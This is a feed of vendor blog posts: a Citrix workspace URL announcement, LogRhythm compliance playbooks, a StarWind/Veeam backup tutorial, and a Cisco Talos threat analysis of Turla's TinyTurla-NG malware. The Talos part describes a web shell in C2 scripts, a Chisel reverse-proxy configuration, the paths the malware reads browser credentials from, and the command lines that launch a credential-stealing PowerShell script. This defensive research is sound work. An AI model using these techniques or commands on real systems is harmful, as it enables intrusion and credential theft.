Thursday, February 22, 2024

Introducing more access options with Multi-Workspace URL!

How users access their resources is a crucial part of the Citrix environment. Enterprises want  to make access as easy as possible while maintaining security and delivering the right resources. This is often done by separating the access layer into different URLs. Though secure, this process takes time for the administrators to implement to ensure they are maintaining the required security and resources for each use case. 

Our teams are continuously working to simplify processes. To address this need to simplify user access, we are excited to announce that the Multi-Workspace URL functionality is now available natively within Citrix Cloud! We recognize that many of our enterprise customers have mature access tiers often requiring more than a singular access URL. You can now create up to 10 URLs in your Citrix Cloud environment!

This functionality helps address three key concerns with multiple access points: branding, authentication methods, and resource filtering. Read further about how our new functionality can address these key areas.


There are often multiple groups of users accessing a Citrix environment. These users may be from a variety of business units such as HR and IT or even third parties like contractors or vendors. In order to help users identify that they are at their correct access URL, companies often employ different branding and customizations to make them easily identifiable at a glance. You have the ability to customize your branding per URL or by user group, or both! Leveraging Multi-Workspace URL allows admins to configure store URLs that are easily remembered by users. This simplifies access and increases productivity. 

Theme prioritization is also supported with Multi-Workspace URL. The theme that will be applied is the highest priority theme that applies to a given user group membership and Workspace URL, or both. Now you can ensure your Citrix UI looks great, and make it easier for your users to know they’re in the right spot!


A common reason for different access points is that user groups require different authentication methods. To utilize different authentication methods within your Citrix environment, we will soon be introducing a new feature to private Tech Preview called Conditional Authentication. With Conditional Authentication, customers will be able to select authentication methods based on conditionals like a user’s domain,group, or Workspace URL. If you are interested in being a part of the private Tech preview, please fill out this form

Adaptive Authentication can also be used with multi-URL to implement nFactor flows. These nFactor flows allow for different authentication methods depending on whatever factors you configure — including your different Workspace URLs.

With Multi-Workspace URL, you can ensure your end users use  the right authentication methods for their use case. If migrating from an on-prem deployment, these features will help ensure your users can continue to use the URL and authentication methods they are familiar with, ensuring a smooth transition and user experience. 

Resource Filtering

Once a user logs on into the environment, they need to have access to all their vital resources to get their work done. With users potentially accessing multiple Workspace URLs, you must  ensure they only see their specific resources in each store. This is where our new resource filtering functionality can help.

With this feature rollout, we are adding new smart access functionality to  the Citrix UI. This allows for filtering within a delivery group based on the specific URL the user is accessing from.  These access policy filters in the following ways:

  • Match any: The access policy allows access if any of the given filter criteria is matched by the incoming request.
  • Match all: The access policy allows access only if all of the given filter criteria are matched by the incoming request.
  • Exclude: The access policy will exclude the rule if this filter criteria is met. 

Control access to your resources like never before with our new smart access policies for Workspace URLs.

Learn More

Check out our product documentation to learn more about this new feature.

Disclaimer: This publication may include references to the planned testing, release and/or availability of Cloud Software Group, Inc. products and services. The information provided in this publication is for informational purposes only, its contents are subject to change without notice, and it should not be relied on in making a purchasing decision. The information is not a commitment, promise or legal obligation to deliver any material, code, or functionality. The development, release, and timing of any features or functionality described for products remains at the sole discretion of Cloud Software Group, Inc.

from Citrix Blogs

Gemini models are coming to Performance Max

New improvements and AI-powered features are coming to Performance Max, including Gemini models for text generation.

from AI

How to Leverage Case Playbooks for Compliance 

Mature security processes should involve leveraging playbooks to guide their responses to potential breaches and ensure compliance with regulations. These playbooks serve as dynamic blueprints, outlining predefined steps, protocols, and best practices tailored to specific scenarios. Harnessing the power of playbooks in cybersecurity not only streamlines incident response but also empowers organizations to preemptively mitigate risks, fortify defenses, and maintain regulatory adherence. 

How LogRhythm Case Playbooks Help with Compliance 

LogRhythm Case Playbooks make it easier and more repeatable for analysts to respond to incidents and security events within a security information and event management (SIEM) platform. Through the rich feature set of Case Playbooks, analysts can not only create their own playbooks, but modify existing playbooks, as well as attach company policies and procedures to the playbook. All these features let the analyst react faster and more efficiently.  

Because Playbooks are a documented set of procedures, they also lend themselves well to performing activities related to compliance requirements. Maintaining proper compliance can be challenging, but implementing more compliance-focused playbooks or taking your existing security-focused use case playbooks and reviewing them for compliance considerations will benefit your company. This will be beneficial for new and inexperienced analysts with less experience with compliance. 

Cybersecurity Playbook Examples 

In this blog, the LogRhythm Labs compliance research team highlights two examples where Playbooks can help strengthen your compliance maturity and reduce gaps in your compliance. For LogRhythm customers, both Playbooks can be found in LogRhythm Community.

Playbook #1: Data Exfiltration 

In this first example, you can observe appropriate actions to consider when tackling potential data exfiltration from a compliance perspective. The goal of this playbook is to provide a template guidance for new analysts when mitigating a detected data breach while remaining compliant with relevant data protection laws/frameworks (in this case GDPR). Data breaches are one of the most common security risks an organization can experience, so it’s pivotal to establish an action plan that alleviates the pressure of singularity and encourages efficient collaboration.  

SIEM data exfiltration playbook for compliance

In the context of compliance and technical analysis, here are preliminary and closing steps to consider when building out a reaction plan towards data breaches: 

  1. Stay Calm and Composed 
    • Maintain a calm demeanor and focus on the task at hand. Security breaches can be stressful, but a composed response is crucial. 
  2. Incident or Event 
    • Determine if you are investigating an incident or event. 
  3. Identify the Affected Host 
    • Identify the host involved with the signaled data exfiltration alarm. 
  4. Validate Detection 
    • Collaborate with the security operations center (SOC) department to confirm the validity of the alert, whether it is a False Positive or a True Positive. Then check if the alarm context aligns with your organization’s policies and expectations regarding data exfiltration. 
  5. Notify Management and Incident Response Team 
    • If the detection is confirmed to be a True Positive immediately inform your supervisor or the designated incident response team within your organization about the breach. Time is critical so swift action is required. 
  6. Document the Incident 
    • Start documenting all relevant details about the breach within a breach report, including the date and time it was discovered, the method of breach, affected systems, and the potential impact. Ensure all information is accurate and well organized. 
  7. Activate the Incident Response Plan 
    • Refer to your organization’s incident response plan and follow the predefined steps for addressing security incidents. This plan should outline roles and responsibilities during a breach. 
  8.  Data Breach Notification 
    • Determine whether it constitutes a data breach as defined by GDPR and other relevant laws. If the breach meets the criteria for notification, work with legal and compliance teams to prepare and submit notifications to regulatory authorities and affected individuals within the required timeframe. 
  9. Communication 
    • Coordinate internal and external communication efforts. Ensure that affected parties are informed in a timely and appropriate manner. Maintain a record (for example emails, instant messages, etc.) of all communication related to the breach. 
  10. Legal and Regulatory Compliance 
    • Assist in the collaboration with legal counsel to ensure that all actions taken are compliant with GDPR and other data protection laws/regulations. 
  11. Continuous Improvement 
    • Continuously assess and improve data security and compliance measures based on lessons learned from the breach and changes in regulations. 

Handling data breaches from a compliance perspective requires a combination of technical knowledge, legal understanding, and strong communication skills. Collaboration with IT, legal, and internal security teams is crucial to effectively manage and mitigate the impact of a breach. Please ensure to employ this document as a template and refer to your organization’s policies/best practices when creating your playbook. 

Playbook #2: “Material” Incidents 

This second example is related to the SEC’s new rules for public companies around the disclosure of “material” cyber incidents. This has been a popular and often contentious topic amongst industry professionals as the requirements of the new rule have parameters that are open to interpretation, specifically around what constitutes a material incident and the timeline for disclosure.  

Materiality, as described by the SEC in the final rule, means that “there is a substantial likelihood that a reasonable shareholder would consider it important.” Once an incident is determined to be material, an organization has four days to disclose. By this definition, materiality is not necessarily a simple financial threshold or set of events that must occur, but a culmination of data points that in aggregate could be material to a reasonable investor. Given the nature of this independent evaluation of materiality, each organization is likely to have a decision maker, or set of decision makers, that evaluates the circumstances to determine the materiality.  

Because of this, our playbook template does not provide a step-by-step guide to determining if a given incident is material. This playbook is intended to help security analysts track the path of an incident across internal and external systems, capture related evidence, and communicate that information to appropriate stakeholders for ultimate evaluation of materiality. By following the guidance in this template, the appropriate stakeholders should be informed in a timely manner and have enough evidence to assess materiality and the need to make public disclosures. 

LogRhythm SIEM playbook for compliance

Figure 1: Material Incident Playbook Procedures in LogRhythm SIEM

  1. Determine if you are investigating an incident or event 
    • This step could take further investigation to complete depending on your organization’s definition of event and incident, but is a key delineation that should be made 
  2. Acquire, preserve, secure, and document evidence
    • By creating the case it is likely that some evidence related to the incident is already attached, but it is critical to gather all related data into the case for evaluation by yourself and others reviewing.  
  3. Identify the hosts impacted involved with the incident and obtain a forensic image of the system 
    • The importance of preserving evidence is critical. Additionally, this is a perfect opportunity to make note of whether the systems are in scope for any compliance efforts and make initial contact with those system owners.  
  4. Identify the services impacted 
    • Document the nature of the impact on any impacted services and the timing related to that impact. This information will help decision-makers evaluate the scope and size of the incident.  
  5. Identify the method of attack
    • This step may not be readily apparent but will be important for decision makers to understand and potentially include when disclosing. 
  6. Identify the source of attack 
    • If possible, identify and document the source of the attack. Use OSINT resources as necessary to source the activity and link it to potential threat actors. Like the step prior, this step may take time, but will also be important for decision makers in evaluating the overall significance of the incident and ongoing risk. 
  7. Disable any affected user accounts 
    • Any user accounts utilized during the attack, either compromised or newly created, should be tracked and recorded within case. This will be important in both stopping the potential spread of the incident and again tracking the overall scope of what occurred.  
  8. Identify data classification of the data involved 
    • Identify what data may have been impacted in relation to this incident. Once identified, determine the impact to affected data (read, exfiltrated, modified, deleted) and determine ownership of data. This step can be difficult without a robust and mature data governance program in place, but narrowing down the impacted data involved will again help define the overall scope and potential impact of the incident.  
  9. Notify Security Leader 
    • By this point it is important to engage the appropriate security and/or compliance leader of the active incident investigation and interim status along with an expected evaluation completion. This will allow decision makers to begin evaluating initial facts and considerations for disclosure. 
  10. Identify how the incident occurred 
    • Identify how the incident occurred by evaluating method of attack, impacted resources, and evaluation of host logs. 
  11. Provide feedback and lessons learned to reduce chances of a reoccurring incident 
    • Identify all vulnerabilities that were a part of this incident and provide steps to harden against such vulnerabilities in the future to the system, application, and data owners. Furthermore, provide a summary to the directors of those owners. Depending on the severity of the incident, you may also want to hold a lessons learned meeting with the directors and their managers. 

Both examples are prime compliance use-case templates. When considering these playbooks or any other template for compliance purposes, it is important to continuously reevaluate their value, alignment with internal procedures, and reducing duplication.  

To learn more about how LogRhythm can help you achieve compliance, visit our webpage overview.

The post How to Leverage Case Playbooks for Compliance  appeared first on LogRhythm.

from LogRhythm

Setting up StarWind Virtual SAN (VSAN) as Hardened Repository for Veeam B&R


Hi, fellas. If you’re in charge of keeping your business data safe, you know that protecting it from ransomware and other threats is a top priority. One of the best ways to do this is using a 3-2-1-1 backup practice. That extra “1” in 3-2-1-1 stands for using immutable storage, such as on a Linux-based hardened repository.

In this article, I will show you how to turn your existing or aging server hardware into immutable backup storage to keep your data safe against ransomware. All you need is Veeam Backup & Replication and StarWind VSAN that will perform a role of Hardened Repository. This is a super easy and efficient way to keep your data safe, and I’ll walk you through the entire process step by step.

Why immutability?

Firstly, let’s talk about why backups have to be immutable. Essentially, it means that once a backup is made, it can’t be deleted or changed. This is important for crucial data because it means that even if a hacker gets into your system and tries to remove your backups, they won’t be able to. This is why write-once-read-many (WORM) storage media like tape libraries and optical media are commonly used for backups. However, these types of media can be a bit of a pain to manage because they need to be rotated and replaced regularly to align with retention policies.

What’s the easiest way to enable immutability? 

This is where Veeam B&R comes in – it’s an industry-standard backup solution that works with most storage media types, including physical and virtual tapes. What’s more, in Veeam B&R v11, they added support for  Hardened Backup Repositories, allowing to enable immutability for backups without using object storage or any specialized third-party solutions. You can find the deployment documentation for this on Veeam B&R KB.

Now, you could go through the process of setting up a Linux server and configuring it to work with Veeam B&R, but it’s not exactly a walk in the park. However, there’s good news – we’ve made it super simple with StarWind VSAN. Diagram: StarWind VSAN as Hardened Repository for Veeam B&R

We’ve developed a set of management tools that are pre-configured in the web console, so you can easily set up a storage server using commodity hardware. All you need to do is use a few wizards in StarWind Virtual SAN  web-console, and you’ll have a hardened repository for Veeam B&R in no time.

How to set up?

In today’s article, I won’t be covering the initial setup process. For details on configuring the StarWind Controller Virtual Machine (CVM), its networking, and storage, refer to our previous article: ‘How to Create a File Share with StarWind VSAN‘. Make sure to review it before proceeding. We’ll also post instructions for the bare-metal StarWind VSAN deployment in a separate blog post later on, so stay tuned.

Assuming you’ve completed the preliminary steps and created a storage pool, we can now move on to creating a new volume in the Virtual SAN Web UI.

Once the storage pool is created, navigate to the “Volumes” tab and click the “+” button to open the “Create volume” wizard:

“Volumes” tab | “Create volume”

Now select the storage pool that you are going to use for the new volume and click “Next”:

Create volume wizard | Select storege pool

Specify the name of the new volume and select the required size:

Create volume | Specify settings

Now select the filesystem for your volume. Select the “Backup repository” option, because it is already configured according to Veaam best practices and recommendations.

Create volume | Choose Filesystem settings

Review your settings and click “Create” to create the new volume:

Create volume | Review summary

After this, you need to add a Veeam user to the CVM to provide Veeam access to the storage. For this, in the “Volumes” tab, select your newly created backup volume and click “Manage VHR (Veeam Hardened Repository) user.

In the “Manage VHR user” pop-up window, click the “+” button:

Manage VHR user | Create Veeam user

Specify the credentials for the new user:

Create Veeam user | Specify the credentials for the new user

Select the newly created user and enable SSH access for it, and click “Save”:

Manage VHR user | Select the newly created user and enable SSH

Congrats! You have completed the StarWind VSAN configuration. You’ll need to connect the created volume to Veeam B&R as the new backup repository. To do that, open the Veeam Backup and Replication console, navigate to “Backup Infrastructure”, and select “Backup Repositories”:

Veeam Backup and Replication console | Navigate to “Backup Infrastructure”, and select “Backup Repositories”

Click “Add Repository”  and select “Direct attached storage:

Add Backup Repository | Select “Direct attached storage

Next, select “Linux (Hardened Repository)”:

Direct Attached Storage | Select “Linux (Hardened Repository)”

In the “New Backup Repository” wizard, specify the name and description for the new repository and click “Next”:

“New Backup Repository” wizard | Specify the name and description for the new repository

In the next step, click “Add New”:

New Backup Repository wizard | Add New

In the “New Linux Server” wizard, specify the IP address or the DNS name of your StarWind CVM and click “Next”:

New Linux Server wizard | Specify the IP address or the DNS

Click “Add” and specify the credentials of the VHR user account that you created in StarWind VSAN Web UI:

New Linux Server | Specify the credentials of the VHR user account

SSH Connection | Provide Credentials

Review the installed components and click “Apply”:

New Linux Server | Review the installed components

Wait until the installation is completed and then click the “Next” button:

New Linux Server | Wait until the installation is completed

Review the summary and click “Finish”:

New Linux Server | Review the summary

In the “New Backup Repository” wizard, select the newly added Repository server from the drop-down menu:

New Backup Repository wizard | Select the newly added Repository server

Now, select the path to the volume on the StarWind VSAN appliance. Also, check that the “Use fast cloning on XFS volumes” setting is enabled and specify the required retention period for immutability:

New Backup Repository | Select the path to the volume on the StarWind VSAN appliance

After that, check the Mount Server settings, where you will be doing fast restores of your backups:

New Backup Repository | Check the Mount Server settings

Check the components that will be installed and click “Apply”:

New Backup Repository | Check the components that will be installed

Wait until the process is completed and click “Next”:

New Backup Repository | Wait until the process is completed

Review the summary and click “Finish”:

New Backup Repository | Review the summary

To secure the server from potential local threats such as credentials theft, in the StarWind VSAN Web UI, navigate to the “Volumes” page, launch the “Manage VHR user” wizard, and disable SSH for the VHR user account:

Manage VHR user wizard | Disable SSH for the VHR user account


Additionally, keep in mind that this method makes it easy to set up a hardened repository and secure your backups. It’s still important to regularly test and verify your backups to ensure they are working properly and can be restored in case of an emergency. Ensure your software and hardware up to date, and to have a disaster recovery plan in place in case the worst happens.


To sum up, using StarWind VSAN as hardened repository for Veeam B&R is a great way to protect your business data from any threats, while also making the process of setting it up easy and straightforward. With the help of our management tools, you can have a secure and reliable backup solution up and running in no time. So, if you’re looking to upgrade your backup strategy and keep your data safe, give StarWind VSAN a try.

This material has been prepared in collaboration with Asah Syxtus Mbuo, Technical Writer at StarWind.

from StarWind Blog

TinyTurla-NG in-depth tooling and command and control analysis

TinyTurla-NG in-depth tooling and command and control analysis
  • Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.
  • Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.
  • Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.
  • One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.
  • Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.


C2 server analysis

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.

TinyTurla-NG in-depth tooling and command and control analysis

C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

  • "task": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.
  • "gettask": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.
  • "result": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.
  • "getresult": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.
  • "file" + "name": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.
  • "cat_file": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.
  • "rm_file": Remove/delete a file specified by the requestor from the C2 server.
TinyTurla-NG in-depth tooling and command and control analysis

The C2 script’s request handling logic.

The HTTP form values accepted by the C2 server “task”, “cat_file”, “rm_file”, “get_result” and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, from a remote location, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

TinyTurla-NG in-depth tooling and command and control analysis

Instrumenting TinyTurla-NG to carry out post-compromise activity

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

  • Reconnaissance commands: Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.
TinyTurla-NG in-depth tooling and command and control analysis

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

  • Copy file commands: Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\windows\temp\
TinyTurla-NG in-depth tooling and command and control analysis

PowerShell script copies files to an intermediate location.

  • Exfiltration commands/scripts aka TurlaPower-NG: These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:

  • Chisel: Modified copy of the Chisel client/agent.
  • Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.
  • Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

TinyTurla-NG in-depth tooling and command and control analysis

Using Chisel as another means of persistent access

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\Windows\System32\TrustedWorker[.]exe

The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

  • “R”: Stands for remote port forwarding.
  • “5000”: This is the port on the attacker machine that receives the connection from the infected system.
  • “socks”: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127[.]0[.]0[.]1:1080)

The C2 server that the chisel sample contacts is: 91[.]193[.]18[.]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named as “dropher[.]com” and the subject name is “blum[.]com”.

TinyTurla-NG in-depth tooling and command and control analysis

TLS Certificate for the chisel malware used by Turla. 

During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or they intended for the certificate to be used on another modified chisel implant. 

TinyTurla-NG in-depth tooling and command and control analysis

Certificate issuer DN.

The new certificate has the same issuer but in this case, the common name is blum[.]com and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.

Additional tools for elevated process execution and credential harvesting

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd[.]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.

TinyTurla-NG in-depth tooling and command and control analysis

The tool contains the embedded cmd[.]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:


This script is used to find  login data from Microsoft Edge located at:

%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\windows\temp\<filename>.zip

The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:

TinyTurla-NG in-depth tooling and command and control analysis

PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\Windows\System32\i.exe" _PID_ "powershell -f C:\Windows\System32\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\Windows\System32\cmd.exe /c "powershell -f C:\Windows\System32\edgeparser.ps1"


Ways our customers can detect and block this threat are listed below.

TinyTurla-NG in-depth tooling and command and control analysis

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on


IOCs for this research can also be found at our GitHub repository here.





IP Addresses


from Cisco Talos Blog